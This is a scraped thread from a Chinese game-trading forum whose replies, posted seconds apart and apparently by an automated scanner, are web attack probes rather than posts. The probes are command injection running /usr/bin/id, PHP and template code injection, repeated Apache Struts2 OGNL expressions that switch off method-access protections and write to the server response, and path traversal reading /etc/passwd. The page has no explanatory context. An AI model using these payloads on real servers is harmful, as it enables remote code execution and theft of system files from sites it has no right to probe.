梦幻论坛 › 其它版交易帖移至这里 › 3法爆戒指 3年内

发表于 2015-6-3 17:27:13

/usr/bin/id;

发表于 2015-6-3 17:27:13

;/usr/bin/id;

发表于 2015-6-3 17:27:14

${@print(md5(812812))};

发表于 2015-6-3 17:27:15

string:{var_dump(md5(812812))}

发表于 2015-6-3 17:27:15

'];${@print(md5(812812))};//

发表于 2015-6-3 17:27:19

'+(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+'

发表于 2015-6-3 17:27:19

(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)

发表于 2015-6-3 17:27:20

%{#context['xwork.MethodAccessor.denyMethodExecution']=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()}

发表于 2015-6-3 17:27:20

${#context['xwork.MethodAccessor.denyMethodExecution']=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()}

发表于 2015-6-3 17:27:20

'+(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+'

发表于 2015-6-3 17:27:21

'+(#context['xwork.MethodAccessor.denyMethodExecution']=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+'

发表于 2015-6-3 17:27:21

(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)

发表于 2015-6-3 17:27:24

(#context['xwork.MethodAccessor.denyMethodExecution']=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)

发表于 2015-6-3 17:27:26

../../../../../../../../../../etc/passwd

发表于 2015-6-3 17:27:26

../../../../../../../../../../etc/passwd

查看完整版本: 3法爆戒指 3年内